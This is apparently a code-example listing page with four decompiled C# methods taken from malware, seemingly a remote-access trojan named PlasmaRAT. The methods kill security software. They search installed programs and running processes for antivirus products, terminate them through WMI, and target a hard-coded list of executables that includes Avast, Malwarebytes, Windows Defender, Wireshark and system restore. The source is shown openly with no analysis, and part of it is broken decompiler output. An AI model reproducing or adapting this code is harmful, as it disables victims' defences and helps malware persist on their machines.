Exemple #1
0
        // Token: 0x0600004E RID: 78 RVA: 0x00005508 File Offset: 0x00003708
        public static bool CheckProcess(string location)
        {
            bool result;

            try
            {
                string[] array = Strings.Split(AVKill.SearchStrings, " ", -1, CompareMethod.Binary);
                string   text  = Strings.StrConv(location.ToString(), VbStrConv.Lowercase, 0);
                foreach (string value in array)
                {
                    try
                    {
                        if (text.Contains(value))
                        {
                            AVKill.FuckFileName(location.ToString());
                            BotKillers.KillFile(location.ToString());
                            result = true;
                            break;
                        }
                    }
                    catch (Exception ex)
                    {
                    }
                }
            }
            catch (Exception ex2)
            {
            }
            return(result);
        }
Exemple #2
0
 // Token: 0x0600004B RID: 75 RVA: 0x00005120 File Offset: 0x00003320
 public static void Start()
 {
     try
     {
         if (!AntiEverything.IsAdmin())
         {
             CheckAV.RunAVAdminMode();
         }
         else
         {
             AVKill.searchav(Environment.GetEnvironmentVariable("PROGRAMDATA"));
             AVKill.ProtectMyFile();
             AVKill.searchav(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles));
             AVKill.AVProcSearcher();
             AVKill.FuckFileName("rstrui.exe");
             AVKill.FuckFileName("AvastSvc.exe");
             AVKill.FuckFileName("avconfig.exe");
             AVKill.FuckFileName("AvastUI.exe");
             AVKill.FuckFileName("avscan.exe");
             AVKill.FuckFileName("instup.exe");
             AVKill.FuckFileName("mbam.exe");
             AVKill.FuckFileName("mbamgui.exe");
             AVKill.FuckFileName("mbampt.exe");
             AVKill.FuckFileName("mbamscheduler.exe");
             AVKill.FuckFileName("mbamservice.exe");
             AVKill.FuckFileName("hijackthis.exe");
             AVKill.FuckFileName("spybotsd.exe");
             AVKill.FuckFileName("ccuac.exe");
             AVKill.FuckFileName("avcenter.exe");
             AVKill.FuckFileName("avguard.exe");
             AVKill.FuckFileName("avgnt.exe");
             AVKill.FuckFileName("avgui.exe");
             AVKill.FuckFileName("avgcsrvx.exe");
             AVKill.FuckFileName("avgidsagent.exe");
             AVKill.FuckFileName("avgrsx.exe");
             AVKill.FuckFileName("avgwdsvc.exe");
             AVKill.FuckFileName("egui.exe");
             AVKill.FuckFileName("zlclient.exe");
             AVKill.FuckFileName("bdagent.exe");
             AVKill.FuckFileName("keyscrambler.exe");
             AVKill.FuckFileName("avp.exe");
             AVKill.FuckFileName("wireshark.exe");
             AVKill.FuckFileName("ComboFix.exe");
             AVKill.FuckFileName("MSASCui.exe");
             AVKill.FuckFileName("MpCmdRun.exe");
             AVKill.FuckFileName("msseces.exe");
             AVKill.FuckFileName("MsMpEng.exe");
             AVKill.FuckFileName("blindman.exe");
             AVKill.FuckFileName("SDFiles.exe");
             AVKill.FuckFileName("SDMain.exe");
             AVKill.FuckFileName("SDWinSec.exe");
         }
     }
     catch (Exception ex)
     {
     }
 }
Exemple #3
0
 // Token: 0x0600004F RID: 79 RVA: 0x000055B0 File Offset: 0x000037B0
 public static void AVProcSearcher()
 {
     try
     {
         string value = "Program Files";
         try
         {
             foreach (object obj in ((IEnumerable)NewLateBinding.LateGet(Interaction.GetObject("winmgmts:", null), null, "ExecQuery", new object[]
             {
                 "Select * from Win32_Process"
             }, null, null, null)))
             {
                 object objectValue = RuntimeHelpers.GetObjectValue(obj);
                 if ((NewLateBinding.LateGet(objectValue, null, "ExecutablePath", new object[0], null, null, null).ToString().Contains(value) | NewLateBinding.LateGet(objectValue, null, "ExecutablePath", new object[0], null, null, null).ToString().Contains("ProgramData")) && !NewLateBinding.LateGet(objectValue, null, "executablepath", new object[0], null, null, null).ToString().Contains(PlasmaRAT.InstallationOfEverything) && Operators.CompareString(NewLateBinding.LateGet(objectValue, null, "executablepath", new object[0], null, null, null).ToString(), Application.ExecutablePath, false) != 0)
                 {
                     try
                     {
                         try
                         {
                             if (AVKill.CheckProcess(Conversions.ToString(NewLateBinding.LateGet(objectValue, null, "ExecutablePath", new object[0], null, null, null))))
                             {
                                 Process.GetProcessById(Conversions.ToInteger(NewLateBinding.LateGet(objectValue, null, "ProcessID", new object[0], null, null, null))).Kill();
                             }
                         }
                         catch (Exception ex)
                         {
                         }
                     }
                     catch (Exception ex2)
                     {
                     }
                 }
             }
         }
         finally
         {
             IEnumerator enumerator;
             if (enumerator is IDisposable)
             {
                 (enumerator as IDisposable).Dispose();
             }
         }
     }
     catch (Exception ex3)
     {
     }
 }
Exemple #4
0
        // Token: 0x0600004A RID: 74 RVA: 0x0000508C File Offset: 0x0000328C
        private static void FileSystemWatcher1_Created(object sender, FileSystemEventArgs e)
        {
            int    num;
            int    num4;
            object obj;

            try
            {
IL_00:
                ProjectData.ClearProjectError();
                num = 1;
IL_07:
                int num2 = 2;
                AVKill.CheckFileforAV(e.FullPath);
IL_14:
                goto IL_6F;
IL_16:
                int num3 = num4 + 1;
                num4     = 0;
                @switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num3);
IL_30:
                goto IL_64;
IL_32:
                num4 = num2;
                @switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num);
                IL_42 :;
            }
            catch when(endfilter(obj is Exception & num != 0 & num4 == 0))
            {
                Exception ex = (Exception)obj2;

                goto IL_32;
            }
IL_64:
            throw ProjectData.CreateProjectError(-2146828237);
IL_6F:
            if (num4 != 0)
            {
                ProjectData.ClearProjectError();
            }
        }